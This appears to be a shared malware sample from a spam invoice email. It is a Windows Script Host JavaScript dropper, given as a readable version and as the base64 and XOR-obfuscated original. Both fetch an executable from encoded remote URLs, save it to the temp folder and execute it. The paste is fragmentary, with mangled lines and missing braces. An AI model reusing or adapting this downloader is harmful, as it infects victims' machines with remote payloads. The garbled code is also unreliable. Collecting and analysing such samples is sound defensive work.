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Created February 16, 2016 12:47
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***SPAM*** Invoice #34069680 [Malware]
(function() {
var urls = [
var shell = WScript.CreateObject('WScript.Shell');
var xmlhttp = WScript.CreateObject('MSXML2.XMLHTTP');
var stream = WScript.CreateObject('ADODB.Stream');
var tmp = shell.ExpandEnvironmentStrings('%TEMP%\\');
var file = tmp + 4194304 + '.exe';
var downloaded = false;
for (var i = 0; i < urls.length; i++) {
try {
var url = urls[i];'CreateObject', url, false);
if (xmlhttp.status == 200) {
try {;
stream.type = 1;
if (stream.size > 254976) {
i = urls.length;
stream.position = 0;
stream.saveToFile(file, 2);
downloaded = true;
} finally {
} catch (ignored) {
if (downloaded) {
shell.Exec(tmp + 4194304);
function decode(willfulbRL, yieldwDd, projectr6v) {
willfulbRL = willfulbRL.replace(/[^A-Za-z0-9\+\/\=]/g, "");
var blightedfEC = [ 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, 64, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51 ];
var punditpfm = yieldwDd;
if (!punditpfm) {
punditpfm = new Uint8Array(Math.ceil(willfulbRL.length / 4) * 3);
projectr6v = projectr6v || 0;
var gravityi7v, wryL9G, insinuateFyG, effluviumf6q;
var dwellDRs = 0, equableXXH = projectr6v;
while (dwellDRs < willfulbRL.length) {
gravityi7v = blightedfEC[willfulbRL.charCodeAt(dwellDRs++) - 43];
wryL9G = blightedfEC[willfulbRL.charCodeAt(dwellDRs++) - 43];
insinuateFyG = blightedfEC[willfulbRL.charCodeAt(dwellDRs++) - 43];
effluviumf6q = blightedfEC[willfulbRL.charCodeAt(dwellDRs++) - 43];
punditpfm[equableXXH++] = gravityi7v << 2 | wryL9G >> 4;
if (insinuateFyG !== 64) {
punditpfm[equableXXH++] = (wryL9G & 15) << 4 | insinuateFyG >> 2;
if (effluviumf6q !== 64) {
punditpfm[equableXXH++] = (insinuateFyG & 3) << 6 | effluviumf6q;
return yieldwDd ? equableXXH - projectr6v : punditpfm.subarray(0, equableXXH);
var notwithstandingpkD = function(campaignnf2) {
var incipientkat = [];
var preenXZH = decode(campaignnf2, incipientkat);
var gustopnH = "charCodeAt";
var inflammatoryDTn = "";
for (var dwellDRs = 0; dwellDRs < preenXZH; dwellDRs++) {
inflammatoryDTn += String.fromCharCode(incipientkat[dwellDRs] ^ "mjaPIXtQ0QpNaaxH"[gustopnH](dwellDRs % "mjaPIXtQ0QpNaaxH".length));
return inflammatoryDTn;
var rangingMiw = function() {
var cleaveVvF = function() {};
cleaveVvF.prototype.yQhSoIY7NN = function(establishcw9) {
var nicetyek4 = notwithstandingpkD('"LhgEMT09OzNaNBM6"');
return WScript[nicetyek4](establishcw9);
return cleaveVvF;
(function() {
var mienbC5 = new rangingMiw();
var commissionURF = 200;
var discreetlbf = notwithstandingpkD('"Ki81"');
var attitudeNKt = notwithstandingpkD('"KBIEMw=="');
var construejUz = notwithstandingpkD('"AhoEPg=="');
var incipientbeW = notwithstandingpkD('"OjkCIiAoAH9jORUiDQ=="');
var veritablea7S = notwithstandingpkD('"IDk5HQVqWgl9HTgaNTE="');
var vapidPnt = notwithstandingpkD('"GFMtAAoeMD12CQ=="');
var frontieroWl = notwithstandingpkD('"Lz0NJB87TTdxBQ=="');
var weltbit = notwithstandingpkD('"FSYWJjhqPiR3NQ=="');
var plenitudeW41 = notwithstandingpkD('"IDIjHgMBMWdUAA=="');
var forebodingT4l = notwithstandingpkD('"FSEiZwgLPGBIOg=="');
var premiseoOT = notwithstandingpkD('"ADkoNw4tEwZiGg=="');
var succorYIl = notwithstandingpkD('"Cz8GPCYMQxdWCA=="');
var quaffJ01 = notwithstandingpkD('"Phk1Ii4ILSVgAg=="');
var prognosticatea8B = notwithstandingpkD('"CVwuBQcQPQlIKA=="');
var hummockRan = notwithstandingpkD('"LC4uFAs="');
var meanderwfu = notwithstandingpkD('"Ph4TNSg1"');
var declivityy8l = notwithstandingpkD('"SD4kHRl9KA=="');
var stumppe5 = notwithstandingpkD('"Qw8ZNQ=="');
var acquiesceBbn = Math.pow(2, 10) * 249;
var effeteglf = [ notwithstandingpkD('"BR4VIHN3WyZYNAIvEwQBJxgMEz8kPhJ/Uz4dYVNUVi0VDw=="'), notwithstandingpkD('"BR4VIHN3WzBCNB4qEw4NIxQZBSE4dhc+XX5Ce08EAC0="') ];
var enduex6F = 4194304;
var speciousO8k = mienbC5[notwithstandingpkD('"FDsJAyYRLWZ+Hw=="')];
var erodeBHe = speciousO8k(incipientbeW);
var dispatchXcP = speciousO8k(veritablea7S);
var crabbedsyo = speciousO8k(hummockRan + notwithstandingpkD('"Qw=="') + meanderwfu);
var archetypeoZs = erodeBHe.ExpandEnvironmentStrings(declivityy8l);
var contractlbs = archetypeoZs + enduex6F + stumppe5;
var gawkbBz = false;
for (var scrupulousbKq = 0; scrupulousbKq < effeteglf.length; scrupulousbKq++) {
try {
var nostrumLvw = effeteglf[scrupulousbKq];, nostrumLvw, false);
if (dispatchXcP.status == commissionURF) {
try {
crabbedsyo.type = 1;
if (crabbedsyo.size > acquiesceBbn) {
scrupulousbKq = effeteglf.length;
crabbedsyo.position = 0;
crabbedsyo.saveToFile(contractlbs, 2);
gawkbBz = true;
} finally {
} catch (ignored) {}
if (gawkbBz) {
erodeBHe[attitudeNKt](archetypeoZs + Math.pow(2, 22));
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